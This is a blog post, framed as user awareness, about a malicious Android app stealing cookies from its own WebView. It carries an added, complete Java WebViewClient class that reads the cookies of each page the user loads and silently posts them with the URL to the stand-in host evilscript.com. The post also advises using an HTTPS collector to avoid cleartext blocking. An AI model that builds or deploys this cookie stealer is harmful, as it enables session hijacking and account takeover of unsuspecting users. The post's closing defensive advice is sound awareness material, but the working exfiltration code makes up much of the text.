Many Android applications display web content and interact with it. They do this by embedding a component that is essentially a stand-alone web browser: the WebView. The application hosting a WebView has a number of APIs for driving it and for reading what goes on inside it. This blog post looks at cross-site scripting (XSS) attacks that are specific to the Android WebView, in particular how a malicious host application can collect the cookies of the sites its user visits inside it.

What is Cross-site Scripting?

Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. To protect the user's environment from malicious code, browsers enforce the same-origin policy, a sandboxing mechanism that lets a script access only the resources that belong to the site it came from. This protection fails when a script chosen by an attacker is delivered to the user from a trusted site, typically because the site echoes unvalidated input back into its pages. The browser then runs the malicious script with full access to everything that belongs to the trusted origin (authentication tokens, session cookies, page content). Such attacks are called cross-site scripting (XSS) attacks.

How are Cross-site scripting attacks possible in Android?

On Android the attacker's script does not have to come from the web at all. A malicious third-party application installed on the phone embeds the trusted site in its own WebView and, because it controls that WebView, can read sensitive page content and session cookies for that site. If the application also holds the matching permissions, it can combine what it learns with other data on the phone, such as contacts.

Cross-site scripting by stealing cookies from the user's device

The most common goal of an XSS attack is to gather cookies. Cookies are small pieces of data that the browser stores on the user's device as name-value pairs together with some metadata (domain, path, expiry, flags). They are commonly used to keep information across requests within a browser session or from one session to the next, such as session IDs, user preferences, or login state; whoever holds a valid session cookie can act as the logged-in user.

The application that hosts the WebView can observe every event that happens inside it. By installing a WebViewClient it is told about each navigation, and at that point it can read the cookies for the current URL with the getCookie() method of the CookieManager class, as in the code fragment below:

    CookieManager cookieManager = CookieManager.getInstance();
    final String cookie = cookieManager.getCookie(url);

The application then sends the cookies and the URL to a third party (the attacker's server) with an HttpPost. Nothing in the WebView stops this: the same-origin policy and the browser's cookie protections constrain JavaScript running inside the page, not the Java code of the application that embeds the WebView, and that application owns the WebView's cookie store, which lives in its own private data directory. (DefaultHttpClient comes from the Apache HttpClient library, which was removed from the Android SDK in API 23; a current app would use HttpURLConnection or a third-party client, but the idea is the same.)

    HttpClient httpClient = new DefaultHttpClient();
    HttpPost httpPost = new HttpPost("http://evilscript.com/androidCookie.php");
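The two fragments above are the two halves of one procedure: harvest the cookies at every navigation, then ship them off the device. The class below is an added example, not code from the original post, that puts them together as a WebViewClient. It uses HttpURLConnection instead of the Apache HttpClient of the post's fragment, because that library is no longer part of the Android SDK; the collecting URL is the same placeholder host the post uses, and the class, method and field names are assumptions made for this example.

```java
// Added example (not from the original post): a WebViewClient that reads the
// cookies of every page the user opens inside the hosting app's WebView and
// sends them, together with the URL, to a server run by the app's author.
// EXFIL_URL reuses the post's placeholder host; all other names are assumed.
package com.example.webviewcookie;

import android.webkit.CookieManager;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.IOException;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class CookieHarvestingClient extends WebViewClient {

    // Same placeholder collecting server as in the post's HttpPost fragment.
    private static final String EXFIL_URL = "http://evilscript.com/androidCookie.php";

    // Network I/O on the main thread throws NetworkOnMainThreadException
    // (API 11 and later), so uploads run on a single background thread.
    private final ExecutorService io = Executors.newSingleThreadExecutor();

    // Invoked once per finished page load, i.e. "at every page navigation".
    @Override
    public void onPageFinished(WebView view, String url) {
        super.onPageFinished(view, url);

        // Java in the host app reads the cookie store directly. The WebView's
        // same-origin policy governs JavaScript inside the page, not this call,
        // which returns every cookie the app's store holds for this URL.
        String cookie = CookieManager.getInstance().getCookie(url);
        if (cookie == null || cookie.isEmpty()) {
            return;
        }
        final String body = buildForm(url, cookie);
        io.execute(() -> {
            try {
                post(EXFIL_URL, body);
            } catch (IOException ignored) {
                // Failing silently keeps the app looking normal to the user.
            }
        });
    }

    // Builds an application/x-www-form-urlencoded body: url=...&cookie=...
    static String buildForm(String url, String cookie) {
        try {
            return "url=" + URLEncoder.encode(url, "UTF-8")
                    + "&cookie=" + URLEncoder.encode(cookie, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException(e); // UTF-8 is always available
        }
    }

    // Plain HTTP POST to the collecting server: the role HttpPost plays in the post.
    static int post(String target, String body) throws IOException {
        HttpURLConnection conn = (HttpURLConnection) new URL(target).openConnection();
        try {
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            byte[] bytes = body.getBytes(StandardCharsets.UTF_8);
            conn.setFixedLengthStreamingMode(bytes.length);
            try (OutputStream out = conn.getOutputStream()) {
                out.write(bytes);
            }
            return conn.getResponseCode();
        } finally {
            conn.disconnect();
        }
    }
}
```

The app attaches the client with webView.setWebViewClient(new CookieHarvestingClient()) and needs only the INTERNET permission, which users rarely question. Two practical caveats: apps targeting API 28 or later block cleartext HTTP by default, so a real attacker would use an HTTPS collecting server rather than the http:// placeholder; and each app has its own WebView cookie store, so the code only ever sees cookies for sessions the user establishes inside this app's WebView, never Chrome's or another app's cookies.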

The attacker now holds all of the user's cookies for the site and can use them for attacks such as session hijacking, impersonating the user with the stolen session. The attack is especially dangerous because the user sees only the trusted content and has no indication that the cookies are being copied. The attack is shown in the figure.






With this post I want to make Android users aware of such malicious applications and help them protect their phones. The practical defense sits at the trust boundary rather than in the browser: a WebView's cookie store belongs to the app that embeds it, so a malicious app can only steal cookies for sessions the user opens inside that app. Log in to sensitive sites only in applications you trust, or in the system browser, and be wary of apps that insist on showing you a trusted site's login page inside their own screens.